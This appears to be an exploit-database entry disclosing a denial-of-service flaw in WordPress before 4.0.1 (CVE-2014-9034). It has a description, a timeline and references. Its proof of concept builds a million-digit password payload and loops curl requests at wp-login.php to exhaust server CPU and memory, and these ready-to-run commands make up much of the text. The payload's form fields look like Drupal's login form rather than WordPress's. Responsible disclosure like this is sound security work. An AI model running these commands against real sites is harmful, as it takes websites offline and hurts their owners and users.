WordPress < 4.0.1 - Denial of Service

Related Vulnerabilities: CVE-2014-9034  
Publish Date: 01 Dec 2014
                							

            ====================================================================
DESCRIPTION:
====================================================================
A vulnerability present in Wordpress &lt; 4.0.1 allows an
attacker to send specially crafted requests resulting in CPU and memory
exhaustion. This may lead to the site becoming unavailable or
unresponsive (denial of service).

====================================================================
Time Line:
====================================================================

November 20, 2014 - A Wordpress security update and the security
advisory is published.

====================================================================
Proof of Concept:
====================================================================
Generate a pyaload and try with a valid user:

echo -n "name=admin&amp;pass=" &gt; valid_user_payload &amp;&amp; printf "%s"
{1..1000000} &gt;&gt; valid_user_payload &amp;&amp; echo -n "&amp;op=Log
in&amp;form_id=user_login" &gt;&gt; valid_user_payload

Perform a Dos with a valid user:

for i in `seq 1 150`; do (curl --data @valid_user_payload
http://yoursite/wordpress/wp-login.php --silent &gt; /dev/null &amp;); sleep
0.25; done

====================================================================
Authors:
====================================================================

-- Javer Nieto -- http://www.behindthefirewalls.com
-- Andres Rojas -- http://www.devconsole.info

====================================================================
References:
====================================================================

* https://wordpress.org/news/2014/11/wordpress-4-0-1/

* https://www.drupal.org/SA-CORE-2014-006

*
http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html

*
http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html

* http://www.devconsole.info/?p=1050